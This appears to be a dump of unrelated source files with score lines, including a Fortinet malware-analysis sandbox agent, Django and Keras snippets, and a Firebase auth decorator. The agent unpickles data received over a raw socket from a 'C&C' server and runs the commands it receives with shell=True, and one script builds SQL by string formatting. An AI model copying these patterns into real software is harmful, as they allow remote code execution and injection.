x = self.prelu(self.convt2(x)) # (B, 128, W/2, 32, 32) -> (B, 64, W, 64, 64)
x = self.convt3(x) # (B, 64, W, 64, 64) -> (B, 3, W, 128, 128)
return x
| 2.375 | 2 |
File/admin.py | alstn2468/Likelion_DRF_Project | 28 | 11385 | from django.contrib import admin
from .models import File
admin.site.register(File)
| 1.289063 | 1 |
agent/windows/agent.py | fortinet/ips-bph-framework | 21 | 11386 | <reponame>fortinet/ips-bph-framework
import shutil
import socket
import subprocess
import threading
import json
import pickle
import tempfile
import time
import box
import threading
import os
import base64
import getpass
import urllib
import requests
import zipfile
import sys
import pprint
import platform
DEBUG = True
BPH_TEMPLATE_SERVER_IP = sys.argv[1]
BPH_TEMPLATE_SERVER_PORT = int(sys.argv[2])
BPH_CONTROLLER_WEB_PORT = int(sys.argv[3])
running_os = platform.release()
if running_os == "7":
APP_DATA = "C:\\Users\\{current_user}\\AppData\\Roaming\\".format(
current_user=getpass.getuser())
TMP_FOLDER = "C:\\Users\\{current_user}\\AppData\\Local\\Temp\\".format(
current_user=getpass.getuser())
elif running_os == "XP":
# To avoid tool issues when dealing with white-spaced paths.
APP_DATA = "C:\\DOCUME~1\\{current_user}\\APPLIC~1\\".format(
current_user=getpass.getuser())
TMP_FOLDER = "C:\\DOCUME~1\\{current_user}\\LOCALS~1\\Temp\\".format(
current_user=getpass.getuser())
else:
print "Unsupported platform! Exiting..."
sys.exit()
class FilterSpecialVars():
def __init__(self, unfiltered_data, template=None, custom_user_vars=None):
# unfiltered_data should be a list
self.unfiltered_data = unfiltered_data
self.filtered_data = []
self.special_vars = {
'@appdata@': APP_DATA, # os.path.expandvars('%appdata%'),
'@temp@': TMP_FOLDER,
'@toolname@': template['tool_name'], # "peid"
'@filename@': template.tool.filename, # "peid.exe"
'@rid@': template['rid'],
'@md5@': template['md5'],
'@sample@': "\"" + ExecutionManager.sample_abs_path + "\"",
'@sample_filename@': "\"" + os.path.basename(ExecutionManager.sample_abs_path) + "\"",
'@tool_drive@': template['tool_drive'],
'@tool_path@': os.path.join(template['tool_drive'], template['remote_tool_path'].replace('/','\\')),
'@tool_abs_path@': os.path.join(template['tool_drive'], template['remote_tool_path'],
template.tool.filename),
'@report_folder@': os.path.join(APP_DATA, template['rid'], template['tool_name'])
}
if custom_user_vars != None:
self.custom_user_vars_filter(custom_user_vars)
def custom_user_vars_filter(self, custom_user_vars):
if DEBUG: print "Custom User Vars Filtering: {}".format(custom_user_vars)
for k, v in custom_user_vars.items():
key = "@{}@".format(k)
self.special_vars.update({key: v})
if DEBUG: print self.special_vars
def filter_now(self):
def do_filter(unfiltered_string):
for k, v in self.special_vars.items():
if k in str(unfiltered_string):
unfiltered_string = unfiltered_string.replace(k, v)
if DEBUG: print ">> Found: {}".format(unfiltered_string)
return unfiltered_string
for unfiltered_string in self.unfiltered_data:
if len(unfiltered_string) != 0:
if DEBUG: print "### Searching Variable ###: {}".format(unfiltered_string)
self.filtered_data.append(do_filter(unfiltered_string))
if DEBUG: print self.special_vars
if DEBUG:
print"FILTERED: {}".format(self.filtered_data)
# return " ".join(self.filtered_data)
class File(object):
def __init__(self):
pass
def generate_random_file_name(self):
import string
import random
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(0, 10))
def zip_file(self, file_abs_path, seconds=5):
if not file_abs_path.endswith('.log') and not file_abs_path.endswith('.zip'):
if DEBUG: print "Creating compressed (zip) archive: {}".format(file_abs_path)
#time.sleep(5)
try:
zip_filename = "{}.zip".format(os.path.basename(file_abs_path))
if DEBUG: print zip_filename
original_filename = os.path.basename(file_abs_path)
if DEBUG: print original_filename
path_location = os.path.dirname(file_abs_path)
if DEBUG: print path_location
zip_file_abs_path = "{}\\{}".format(path_location, zip_filename)
if DEBUG: print zip_file_abs_path
zf = zipfile.ZipFile(zip_file_abs_path, 'w', zipfile.ZIP_DEFLATED)
# When a file is bein created as compressed file (zip), in some cases
# the set delay time is not enough and file-access errors appears.
# To avoid such situation, several attempts are made until the access
# to the source file is ready.
try:
zf.write(file_abs_path, os.path.basename(file_abs_path))
except IOError:
if DEBUG: print "Target file is still in use... attempting in ({}) seconds".format(seconds)
time.sleep(seconds)
self.zip_file(file_abs_path)
else:
if DEBUG: print "Zip file creation - Done."
except OSError as e:
if DEBUG: print "Error when setting up info for target zip file: {}".format(e)
raise
else:
zipfile.ZIP_DEFLATED
if os.path.isfile(zip_file_abs_path):
if DEBUG: print "Zip file ok: {}".format(zip_file_abs_path)
# os.remove(file_abs_path)
return zip_filename
else:
if DEBUG: print "Zip file can't be created"
return None
class AutoItScript(File):
def __init__(self, automation_data):
self.autoit_script = None
self.__base64totmp(automation_data)
def __base64totmp(self, automation_data):
if DEBUG: print "Converting from base64 file data to Auto-it Script"
tmp_au_script_abs_path = os.path.join(
APP_DATA, self.generate_random_file_name())
with open(tmp_au_script_abs_path, 'w+') as tmp_au_script:
for _ in automation_data:
if DEBUG: print "Writing: {}\n".format(_)
tmp_au_script.write(_)
self.autoit_script = tmp_au_script_abs_path
class DownloadedFile(File):
def __init__(self, download_url):
self.download_dir = APP_DATA
self.fake_file_name = self.generate_random_file_name()
self.original_file_name = os.path.basename(download_url)
self.extension = os.path.splitext(download_url)[1].replace('.', '')
#self.abs_path = os.path.join(self.download_dir, "{}.{}".format(
# self.fake_file_name, self.extension))
self.abs_path = os.path.join(self.download_dir, self.original_file_name)
if DEBUG:
print self.abs_path
class ExecutionManager(object):
report_path = ""
sample_abs_path = ""
#### Agent Command Control ######
def execute_tool(self, **cmd_data):
if DEBUG:
print cmd_data
tool_drive = cmd_data['tool_drive']
tool_path = cmd_data['tool_path'].replace('/', '\\')
tool_name = cmd_data['tool_name']
tool_abs_path = "\"{tool_drive}{tool_path}\\{tool_name}\"".format(
tool_drive=tool_drive,
tool_path=tool_path,
tool_name=tool_name,
)
if DEBUG:
print tool_abs_path
tool_args = cmd_data['tool_args']
if DEBUG:
print tool_args
cmd = "{} {}".format(tool_abs_path, tool_args)
if DEBUG:
print cmd
print "\nExecuting Cmd: {}\n".format(cmd)
subprocess.call(cmd, shell=True)
def exec_manager(self, **cmd_data):
if DEBUG:
if DEBUG: print "\nExecuting Thread with data: {}\n".format(cmd_data)
thread_name = cmd_data['tool_name']
thread = threading.Thread(target=self.execute_tool, name=thread_name, kwargs=cmd_data)
thread.start()
def write_tmp_file(self, datatowrite, sample_abs_path):
try:
if DEBUG: print "Writing Tmp file: {}".format(sample_abs_path)
with open(sample_abs_path, 'wb+') as f:
f.write(datatowrite)
except:
if DEBUG: print "Error while creating the tmp file."
else:
if DEBUG: print "Done."
if os.path.isfile(sample_abs_path):
if DEBUG: print "Temp file created correctly."
# Destination folder is created this way because because
# some tools shows weird behaviors when passing arguments
# For instance, CFF Explorer does not work correctly when
# the file agument resides on a directory with whitespaces.
# The workaround is to use DOS version of the path.
#fixed_sample_abs_path = sample_abs_path.split('\\')
#fixed_sample_abs_path[1] = "docume~1"
#fixed_sample_abs_path[3] = "applic~1"
# print fixed_sample_abs_path
# Setting up Class attribute for sample path
return sample_abs_path
return False
def download_file(self, download_url):
if DEBUG: print "Downloading: {}".format(download_url)
try:
import urllib2
filedata = urllib2.urlopen(download_url)
except urllib2.URLError:
if DEBUG: print "Can't download the target sample file. Make sure BPH Webserver is running on the host."
return False
else:
datatowrite = filedata.read()
sample_abs_path = DownloadedFile(download_url).abs_path
# Used when filtering custom variables
ExecutionManager.sample_abs_path = sample_abs_path
if DEBUG: print "Downloaded file: {}".format(sample_abs_path)
return self.write_tmp_file(datatowrite, sample_abs_path)
def execute_autoit_script(self, template, auto_it_script_abs_path):
# The previously generated AutoIT script will be executed.
if DEBUG: print "Executing Auto-It script"
self.exec_manager(
tool_drive=template.tool_drive,
tool_path='misc\\autoitv3\\',
tool_name='AutoIt3.exe',
tool_args=auto_it_script_abs_path)
def tool_execution(self, template):
def selected_execution(filtered_parameters, filtered_automation):
cascade_execution = False
if filtered_parameters is not None and filtered_automation is not None:
if DEBUG: print "Cascaded Execution Detected: parameters -> autoit"
cascade_execution = True
if filtered_parameters is not None:
if DEBUG: print "Parameter Execution Detected"
self.exec_manager(
tool_drive=template.tool_drive,
tool_path=template.remote_tool_path,
tool_name=template.tool.filename,
tool_args=filtered_parameters
)
if filtered_automation is not None:
# If cascase execution is set, then a delay between tool execution
# and automation is also set. This to allow the tool to properly
# load and the automation be able to run properly. A default value
# of 5 seconds was given.
if cascade_execution:
if DEBUG: print "Cascade Execution Delay - Running now..."
time.sleep(5)
if DEBUG: print "Automation-Only Execution Detected"
custom_user_vars = template.configuration.execution.custom_user_vars
auto_it_script_abs_path = AutoItScript(filtered_automation).autoit_script
self.execute_autoit_script(template, auto_it_script_abs_path)
def filter_custom_vars(template, filter_type=None):
# Handling template parameters custom vars
if filter_type is not None:
custom_user_vars = template.configuration.execution.custom_user_vars
if filter_type == "parameters":
parameters = template.actions[template.actions.action]['parameters']
if parameters is not None:
if DEBUG: print "Parameters: {}".format(parameters)
if len(custom_user_vars) != 0:
if DEBUG: print "Custom Parameters Vars {} - Parameters({})".format(custom_user_vars, parameters)
filtered_parameters = self.filter_variables(
parameters, template, filter_type='parameters', custom_user_vars=custom_user_vars)
else:
filtered_parameters = self.filter_variables(
parameters, template, filter_type='parameters', custom_user_vars=None)
return filtered_parameters
if filter_type == "automation":
automation = template.actions[template.actions.action]['automation']
if automation is not None:
if DEBUG: print "Automation: {}".format(automation)
if len(custom_user_vars) != 0:
if DEBUG: print "Custom Automation Vars {}".format(custom_user_vars)
filtered_automation = self.filter_variables(
automation, template, filter_type='automation', custom_user_vars=custom_user_vars)
else:
filtered_automation = self.filter_variables(
automation, template, filter_type='automation', custom_user_vars=None)
return filtered_automation
action_name = template.actions.action
if DEBUG: print "Executing: {}".format(action_name)
filtered_parameters = filter_custom_vars(template, filter_type='parameters')
filtered_automation = filter_custom_vars(template, filter_type='automation')
selected_execution(filtered_parameters, filtered_automation)
class TemplateManager(ExecutionManager):
def __init__(self, template):
# self.report_directory_check(template.vm_report_name)
if DEBUG: print "#"*50
if DEBUG: print dict(template)
if DEBUG: print "#"*50
# Each tool request must save files. Those can be either a log file
# or output files from its execution. This "report path" folder will
# be created per request.
#
# The /files/ folder will be used to store any additional files generated
# by the tool.
self.report_path_files = os.path.join(
APP_DATA, template.rid, template.tool_name, 'files')
self.report_path = os.path.join(
APP_DATA, template.rid, template.tool_name)
if not os.path.isdir(self.report_path_files):
if DEBUG: print "Creating: {}".format(self.report_path_files)
os.makedirs(self.report_path_files)
if template.configuration.execution['download_sample']:
self.download_file(template.download_url)
# Tool execution will eventually select which execution type will be run,
# either automated or manual (only based in parameters)
self.tool_execution(template)
# Delay (seconds) between tool executions.
exec_delay = template.configuration.execution.delay
if DEBUG: print "Execution Delay (in seconds): {}".format(exec_delay)
time.sleep(exec_delay)
while True:
if DEBUG: print threading.active_count()
if DEBUG: print threading.enumerate()
threads = str(threading.enumerate()).lower()
if template.configuration.execution.background_run:
if DEBUG: print "TOOL DOES RUN IN BACKGROUND..."
if template.tool.filename.lower() in threads:
# FIXED: This allows more than one tool running in background
if threading.active_count() != 1:
if "autoit" not in threads:
if DEBUG: print "TOOL RUN CHECK DONE"
break
else:
if DEBUG: print "TOOL DOES NOT RUN IN BACKGROUND..."
if template.tool.filename.lower() not in threads:
if "autoit" not in threads:
if DEBUG: print "TOOL RUN CHECK - DONE"
break
time.sleep(1)
if DEBUG: print "\n###### Tool execution has ended #######\n"
if DEBUG: print threading.active_count()
if DEBUG: print threading.enumerate()
if template.configuration.reporting.report_files:
if DEBUG: print "########## Starting COLLECTING HTTP FILES ##############"
self.report(template)
def filter_variables(self, data, template, filter_type=None, custom_user_vars=None):
if filter_type == "parameters":
# Convert into list here.
data = data.split(' ')
if filter_type == "automation":
# Decode first, then convert into a list.
data = base64.decodestring(data).split('\n')
if DEBUG: print "Filtering Variables: {}".format(data)
unfiltered_data = FilterSpecialVars(data, template=template, custom_user_vars=custom_user_vars)
unfiltered_data.filter_now()
if DEBUG: print "Filtered Args: ({})".format(unfiltered_data.filtered_data)
if filter_type == "parameters":
return " ".join(unfiltered_data.filtered_data)
if filter_type == "automation":
return unfiltered_data.filtered_data
def report_back(self, report_data):
url = "http://{}:{}/bph/report.php".format(BPH_TEMPLATE_SERVER_IP, BPH_CONTROLLER_WEB_PORT)
files = {'file': open(report_data['file_abs_path'], 'rb')}
response = requests.post(url, data={'project_name': report_data['project_name'],
'md5': report_data['md5'],
'sid': report_data['sid'],
'tool': report_data['tool_name'],
'rid': report_data['rid'],
'file': report_data['file'],
'dir': report_data['dir']}, files=files)
if DEBUG: print "Response: {}".format(response.text)
def report_files(self, base_folder, tool_name):
if DEBUG: print "Searching files in: {} - tool: {}".format(base_folder, tool_name)
while True:
if len(os.listdir(base_folder)) != 0:
if DEBUG: print "Files found.. Collecting them now..."
files_found = []
for root, dirs, files in os.walk(base_folder):
for file in files:
full_path = os.path.join(root, file)
if DEBUG: print "FullPath: {}".format(full_path)
file_name = os.path.basename(full_path)
if DEBUG: print "FileName: {}".format(file_name)
index = full_path.split('\\').index(tool_name)
if DEBUG: print "Index: {}".format(index)
path_found = "/".join([x for x in full_path.split('\\')[index+1:]])
if DEBUG: print "PathFound: {}".format(path_found)
if path_found.count('/') == 0:
# Tool log file was found (e.g. bintext.log)
if DEBUG: print "Found log file: {}".format(path_found)
if path_found.endswith('.log'):
if DEBUG: print "FullPath: {}".format(full_path)
file_and_path_found = [full_path, path_found, '/']
files_found.append(file_and_path_found)
else:
# Any file inside of the /files/ folder.
if DEBUG: print "Found non-log file: {}".format(path_found)
# For non-log files, a file version of the file will be generated
# due problems of uploading big files through HTTP. This is a temporary fix.
zip_filename = File().zip_file(full_path)
file_and_path_found = zip_filename.split() + \
path_found.split('/')[:-1]
if DEBUG: print file_and_path_found
file_and_path_found.insert(
0, full_path.replace(file_name, zip_filename))
if file_and_path_found not in files_found:
if DEBUG: print "Appending file found: {}".format(file_and_path_found)
files_found.append(file_and_path_found)
if DEBUG: print "FullPathFound: {}".format(file_and_path_found)
if DEBUG: print "Files Found: {}".format(files_found)
return list(files_found)
else:
if DEBUG: print "Waiting for files to appear..."
time.sleep(1)
def report(self, template):
def filter_dir(unfiltered_dir):
if DEBUG: print "Unfiltered dir: {}".format(unfiltered_dir)
dir_path = "/".join(unfiltered_dir)
if dir_path.startswith('/'):
return unfiltered_dir[0]
return "/{}".format(dir_path)
report_data = {}
if os.path.isdir(self.report_path):
if DEBUG: print "Sending back results to C&C server..."
# Request variables. Generate data on the server.
report_data['project_name'] = template.project_name
report_data['md5'] = template.md5
report_data['sid'] = template.sid
report_data['rid'] = template.rid
report_data['tool_name'] = template.tool_name
for file_found in self.report_files(self.report_path,
template.tool_name):
# if DEBUG: print "FileFound: {}".format(file_found)
report_data['file_abs_path'] = file_found[0]
report_data['file'] = urllib.quote(file_found[1], safe='')
report_data['dir'] = filter_dir(file_found[2:])
if DEBUG: print report_data
self.report_back(report_data)
if DEBUG: print "Done."
else:
if DEBUG: print "Report Directory ({}) does not exist".format(self.report_path)
def report_directory_check(self, vm_report_name):
report_path = os.path.join(APP_DATA, vm_report_name)
if DEBUG:
print report_path
if not os.path.isdir(report_path):
os.mkdir(report_path)
self.report_directory_check()
else:
REPORT_PATH = report_path
class Agent:
RETRY_SECS = 1
BUFFER_SIZE = 16384
def __init__(self):
self.connection_status = False
#### Agent Control Functions ####
def start(self):
print "Starting Agent..."
# Connect to Server
self.connect()
def stop(self):
print "Stopping Agent..."
self.disconnect()
self.connection_status = False
def restart(self):
self.stop()
self.start()
#### Agent Connection Functions ####
def check_connection(self):
pass
# print dir(self._clientsocket)
def is_connected(self):
if self.connection_status == True:
return True
return False
def send(self, data):
print "Sending Data: {}".format(data)
try:
self._clientsocket.send(data)
except:
self.reconnect()
def listen(self):
print "Connected to C&C Template Server. Waiting for instructions..."
try:
while True:
# Keeps running receiving data. Once received
# it its automatically un-serialized and converted
# into an Python dictionary object.
serialized_data = pickle.loads(self._clientsocket.recv(self.BUFFER_SIZE))
template_data = box.Box(serialized_data)
# TemplateManager decomposes serialized data
# and take actions to execute the selected program
TemplateManager(template_data)
print "Sending back to C&C => OK status"
self.send('ok')
except socket.error as e:
print "Server disconnection: {}".format(e)
self.reconnect()
except EOFError as e:
print "Server disconnection...".format(e)
self.reconnect()
else:
# If template data was received correctly, then acknowledge.
self.send('skip')
def connect(self):
# Make the connection to the server
print "Connecting to C&C Template Server: {}:{}".format(BPH_TEMPLATE_SERVER_IP, BPH_TEMPLATE_SERVER_PORT)
try:
# Initialize Socket & connect back to server.
self._clientsocket = socket.socket()
self._clientsocket.connect((BPH_TEMPLATE_SERVER_IP, BPH_TEMPLATE_SERVER_PORT))
self._clientsocket.setblocking(1)
except socket.error:
self.reconnect()
except KeyboardInterrupt:
print "Interrupting execution."
sys.exit()
else:
print "Connection established. "
self.connection_status = True
self.listen()
def disconnect(self):
self._clientsocket.close()
def reconnect(self):
print "Reconnecting...."
if DEBUG: print "Connection Error. Server down? Attempting connection in: ({}) seconds".format(self.RETRY_SECS)
time.sleep(self.RETRY_SECS)
if DEBUG: print "Attempting now..."
self.connect()
if __name__ == "__main__":
agent = Agent()
try:
agent.start()
while True:
# agent.check_connection()
if not agent.is_connected():
# If agent stops. Start it again.
agent.start()
except KeyboardInterrupt:
print "Manual interruption. Bye!"
sys.exit()
| 2.34375 | 2 |
python/src/learn/lstmSequence.py | kakaba2009/MachineLearning | 0 | 11387 | # LSTM with Variable Length Input Sequences to One Character Output
import numpy
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.utils import np_utils
from keras.preprocessing.sequence import pad_sequences
from theano.tensor.shared_randomstreams import RandomStreams
# fix random seed for reproducibility
numpy.random.seed(7)
# define the raw dataset
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# create mapping of characters to integers (0-25) and the reverse
char_to_int = dict((c, i) for i, c in enumerate(alphabet))
int_to_char = dict((i, c) for i, c in enumerate(alphabet))
# prepare the dataset of input to output pairs encoded as integers
num_inputs = 16
max_len = 5
dataX = []
dataY = []
for i in range(num_inputs):
start = numpy.random.randint(len(alphabet)-2)
end = numpy.random.randint(start, min(start+max_len,len(alphabet)-1))
sequence_in = alphabet[start:end+1]
sequence_out = alphabet[end + 1]
dataX.append([char_to_int[char] for char in sequence_in])
dataY.append(char_to_int[sequence_out])
print( sequence_in, '->', sequence_out )
# convert list of lists to array and pad sequences if needed
X = pad_sequences(dataX, maxlen=max_len, dtype='float32')
# reshape X to be [samples, time steps, features]
X = numpy.reshape(X, (X.shape[0], max_len, 1))
# normalize
X = X / float(len(alphabet))
# one hot encode the output variable
y = np_utils.to_categorical(dataY)
# create and fit the model
batch_size = 1
model = Sequential()
model.add(LSTM(16, batch_input_shape=(batch_size, X.shape[1], X.shape[2]), stateful=True))
model.add(Dense(y.shape[1], activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
for i in range(1):
model.fit(X, y, nb_epoch=1, batch_size=batch_size, verbose=2, shuffle=False)
model.reset_states()
# summarize performance of the model
scores = model.evaluate(X, y, batch_size=batch_size, verbose=0)
model.reset_states()
print("Model Accuracy: %.2f%%" % (scores[1]*100))
# demonstrate some model predictions
for i in range(1):
pattern_index = numpy.random.randint(len(dataX))
pattern = dataX[pattern_index]
x = pad_sequences([pattern], maxlen=max_len, dtype='float32')
x = numpy.reshape(x, (1, max_len, 1))
x = x / float(len(alphabet))
prediction = model.predict(x, verbose=0)
index = numpy.argmax(prediction)
result = int_to_char[index]
seq_in = [int_to_char[value] for value in pattern]
print( seq_in, "->", result )
| 2.9375 | 3 |
DATA/prediction/direction/pred_script.py | korcsmarosgroup/ARN2DataBase | 0 | 11388 | """
Direction prediction based on learning dataset from reactome
PPI direction calculated from domain interaction directions
"""
# Imports
import sqlite3, csv, os
import pandas as pd
import logging
import pickle
# # Initiating logger
# logger = logging.getLogger()
# handler = logging.FileHandler('../../workflow/SLK3.log')
# logger.setLevel(logging.DEBUG)
# handler.setLevel(logging.DEBUG)
# formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# handler.setFormatter(formatter)
# logger.addHandler(handler)
class DirScore:
def __init__(self):
# Defining constants
self.REACTOME_DB = '../../SLKlib/mapper/protein/output/reactome_mapped.db'
self.PFAM_FILE = ['../prediction/direction/files/uniprot-pfam_human.tab',
'../prediction/direction/files/uniprot-pfam_drosi.tab',
'../prediction/direction/files/uniprot-pfam_danio.tab',
'../prediction/direction/files/uniprot-pfam_celegans.tab']
logging.basicConfig(level=logging.DEBUG)
self.pfam_dict = {}
self.dir_score_dict = {}
# Adding the two output dictionaries of test_score function to a pickle files
# so that the next function can access them inbetween script executions
# TODO: remove pickle files after each run
self.PICKLE_FILE = 'dir_score.pickle'
if os.path.isfile(self.PICKLE_FILE):
self.pfam_dict, self.dir_score_dict = pickle.load(open(self.PICKLE_FILE, 'rb'))
else:
self.test_scores()
pickle.dump((self.pfam_dict, self.dir_score_dict), open(self.PICKLE_FILE, 'wb'))
def test_scores(self):
# Setting as global so next script can access it
df_all = pd.DataFrame(columns=['a_dom', 'b_dom'])
conn = sqlite3.connect(self.REACTOME_DB)
# Setting up learning data set
logging.debug("Started connection to reactome dataset")
for inpfam in self.PFAM_FILE:
with open(inpfam) as infile:
infile.readline()
for line in infile:
line = line.strip().split('\t')
if len(line) == 4:
self.pfam_dict[line[0]] = line[3].split(';')[0:-1]
with conn:
c = conn.cursor()
counter = 0
# Getting PPI data
logging.debug('Getting PPI data')
c.execute("SELECT interactor_a_node_name, interactor_b_node_name FROM edge")
while True:
row = c.fetchone()
counter += 1
if row is None:
break
else:
a_node = row[0].split(':')[1]
b_node = row[1].split(':')[1]
if a_node not in self.pfam_dict or b_node not in self.pfam_dict:
continue
int_list = [self.pfam_dict[a_node], self.pfam_dict[b_node]]
for id1, id2 in zip(int_list[0], int_list[1]):
# Setting up dataframe for all domain-domain interactions
# len(df_all) sets the name of the line
df_all = df_all.set_value(len(df_all), col=['a_dom', 'b_dom'], value=[id1, id2])
# All domains in a dataframe, without direction
all_domain_df = df_all['a_dom'].append(df_all['b_dom']).reset_index(name='domain')
all_count = all_domain_df.groupby('domain').size().reset_index(name='counter')
# Getting probability of each domain
# Number of domain occurrence / Number of all domains
logging.debug('Getting probability of each domain')
prob_dom = {}
# Number of all domain occurrences
total_occurrence = all_count['counter'].sum()
# Iterating over domains
for index, domain in all_count['domain'].iteritems():
dom_count = all_count.loc[all_count['domain'] == domain, 'counter'].iloc[0]
P_domain = dom_count / total_occurrence
# Adding data into a dictionary
prob_dom[domain] = P_domain
#print(domain, P_domain)
# Getting directed domain-domain interaction probabilities
# Number of directed DDI / number of all DDIs
logging.debug('Getting DDI probabilities')
prob_inter = {}
# Getting the occurrences for each directed interaction
all_inter_counted = df_all.groupby(['a_dom', 'b_dom']).size().reset_index(name='counter')
all_inter_counter = all_inter_counted['counter'].sum()
# Iterating over interactions
for index2, count in all_inter_counted['counter'].iteritems():
P_inter = count / all_inter_counter
# Getting domain ids
a_dom = all_inter_counted.loc[all_inter_counted['counter'] == count, 'a_dom'].iloc[0]
b_dom = all_inter_counted.loc[all_inter_counted['counter'] == count, 'b_dom'].iloc[0]
# Adding the into a dictionary
prob_inter['->'.join((a_dom, b_dom))] = P_inter
# Calculating direction score
# (P_AtoB - P_BtoA) / P_A * P_B
logging.debug('Calculating direction scores')
for key in prob_inter.keys():
a = key.split('->')[0]
b = key.split('->')[1]
other_dir = '->'.join((b, a))
if other_dir in prob_inter.keys():
dir_score = (prob_inter[key] - prob_inter[other_dir]) / prob_dom[a] * prob_dom[b]
self.dir_score_dict[key] = dir_score
else:
dir_score = (prob_inter[key] - 0) / prob_dom[a] * prob_dom[b]
self.dir_score_dict[key] = dir_score
#print(key, dir_score)
#return self.dir_score_dict, self.pfam_dict
# LAYER 3
def apply_to_db(self):
#logger.debug(self.pfam_dict)
#logger.debug(self.dir_score_dict)
conn2 = sqlite3.connect('SLK3_layers.db')
# logger.debug("Connected to '%s" % conn2)
with conn2:
c2 = conn2.cursor()
c22 = conn2.cursor()
c2.execute("SELECT interactor_a_node_name, interactor_b_node_name FROM ATG_Reg")
while True:
row = c2.fetchone()
if row is None:
break
else:
prot_a = row[0].split(':')[1]
prot_b = row[1].split(':')[1]
dir_score_sum = 0
# Summing DDI scores
#logging.debug('Summing DDI scores')
if prot_a in self.pfam_dict.keys() and prot_b in self.pfam_dict.keys():
for dom_a, dom_b in zip(self.pfam_dict[prot_a], self.pfam_dict[prot_b]):
#print(dir_score_dict['->'.join((dom_a, dom_b))])
if '->'.join((dom_a, dom_b)) in self.dir_score_dict.keys():
dir_score_sum += self.dir_score_dict['->'.join((dom_a, dom_b))]
# To get final direction score of the unknown PPIs we calculate
# the average of each proteins' all domain interaction scores
if len(self.pfam_dict[prot_a]) * len(self.pfam_dict[prot_b]) == 0:
logging.debug(prot_a, len(self.pfam_dict[prot_a]), prot_b, len(self.pfam_dict[prot_b]))
continue
else:
dir_score_final_PPI = dir_score_sum / (len(self.pfam_dict[prot_a]) * len(self.pfam_dict[prot_b]))
#logging.debug("Updating scores")
c22.execute("UPDATE ATG_Reg SET confidence_scores = '%s' "
"WHERE ATG_Reg.interactor_a_node_name = '%s' AND ATG_Reg.interactor_b_node_name = '%s'"
% ('|dir_pred:' + str(dir_score_final_PPI), row[0], row[1]))
if __name__ == '__main__':
test = DirScore()
logger.debug('Creating test set')
test.test_scores()
logger.debug('Adding scores to dataset')
test.apply_to_db()
logger.debug('Direction prediction done')
| 2.296875 | 2 |
src/main.py | vcodrins/json_to_folder | 0 | 11389 | import json
import os.path
import sys
from exceptions import *
from create_folder_structure import create_folder_structure
def main():
try:
if len(sys.argv) != 3:
raise InvalidArgumentCount
if not os.path.exists(sys.argv[2]):
raise InvalidFilePath
if not os.path.exists(sys.argv[1]):
raise InvalidFolderPath
try:
json_object = json.load(open(sys.argv[2]))
except ValueError:
raise InvalidJsonFile
output_folder = sys.argv[1]
create_folder_structure(output_folder, json_object)
except InvalidArgumentCount:
print("""
Invalid number of arguments
Please make sure to use quotes for outputFolder and jsonFile if path includes spaces
Valid paths may be:
"file.json"
"./file.json"
"folder/file.json"
"./folder/file.json"
"absolute/path/to/file.json"
Usage:
main.py "<outputFolder>" "<jsonFile>"
""")
except InvalidFolderPath:
print("""
Output folder does not exist
""")
except InvalidFilePath:
print("""
Input json file does not exist
""")
except InvalidJsonFile:
print("""
Input json file is invalid
""")
main()
| 3.703125 | 4 |
app/conftest.py | hbyyy/newsmailing | 0 | 11390 | <gh_stars>0
from datetime import timedelta
import pytest
from model_bakery import baker
@pytest.fixture()
def create_expire_user():
def make_user(**kwargs):
user = baker.make('members.User')
user.created -= timedelta(days=4)
return user
return make_user
| 2.078125 | 2 |
src/SecurityDecorator.py | JanCwik/SoftwarePraktikum | 7 | 11391 | from flask import request
from google.auth.transport import requests
import google.oauth2.id_token
from server.ApplikationsAdministration import ApplikationsAdministration
#Benutzer.py, BenutzerMapper + BenutzerMethoden in ApplikationsAdministration
def secured(function):
"""Decorator zur Google Firebase-basierten Authentifizierung von Benutzern
Da es sich bei diesem System um eine basale Fallstudie zu Lehrzwecken handelt, wurde hier
bewusst auf ein ausgefeiltes Berechtigungskonzept verzichtet. Vielmehr soll dieses Decorator
einen Weg aufzeigen, wie man technisch mit vertretbarem Aufwand in eine Authentifizierung
einsteigen kann.
POLICY: Die hier demonstrierte Policy ist, dass jeder, der einen durch Firebase akzeptierten
Account besitzt, sich an diesem System anmelden kann. Bei jeder Anmeldung werden Klarname,
Mail-Adresse sowie die Google User ID in unserem System gespeichert bzw. geupdated. Auf diese
Weise könnte dann für eine Erweiterung des Systems auf jene Daten zurückgegriffen werden.
"""
firebase_request_adapter = requests.Request()
def wrapper(*args, **kwargs):
# Verify Firebase auth.
id_token = request.cookies.get("token")
error_message = None
claims = None
objects = None
if id_token:
try:
# Verify the token against the Firebase Auth API. This example
# verifies the token on each page load. For improved performance,
# some applications may wish to cache results in an encrypted
# session store (see for instance
# http://flask.pocoo.org/docs/1.0/quickstart/#sessions).
claims = google.oauth2.id_token.verify_firebase_token(
id_token, firebase_request_adapter)
if claims is not None:
adm = ApplikationsAdministration()
google_user_id = claims.get("user_id")
email = claims.get("email")
name = claims.get("name")
user = adm.get_user_by_google_user_id(google_user_id)
# Benennen wie in ApplikationsAdministration
if user is not None:
"""Fall: Der Benutzer ist unserem System bereits bekannt.
Wir gehen davon aus, dass die google_user_id sich nicht ändert.
Wohl aber können sich der zugehörige Klarname (name) und die
E-Mail-Adresse ändern. Daher werden diese beiden Daten sicherheitshalber
in unserem System geupdated."""
user.set_name(name)
user.set_email(email)
adm.update_benutzer(user)
#set_name und set_email benennen wie in Benutzer.py
#adm.save-user benennen wie in ApplikationsAdministration.py
else:
"""Fall: Der Benutzer war bislang noch nicht eingelogged.
Wir legen daher ein neues User-Objekt an, um dieses ggf. später
nutzen zu können.
"""
user = adm.benutzer_anlegen(name, email, google_user_id)
#Benennen wie in ApplikationsAdministration
print(request.method, request.path, "angefragt durch:", name, email)
objects = function(*args, **kwargs)
return objects
else:
return '', 401 # UNAUTHORIZED !!!
except ValueError as exc:
# This will be raised if the token is expired or any other
# verification checks fail.
error_message = str(exc)
return exc, 401 # UNAUTHORIZED !!!
return '', 401 # UNAUTHORIZED !!!
return wrapper
| 2.9375 | 3 |
code/django18/django18/newsletter/forms.py | dvl/celerytalk | 0 | 11392 | <reponame>dvl/celerytalk
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import forms
class NewsletterForm(forms.Form):
assunto = forms.CharField()
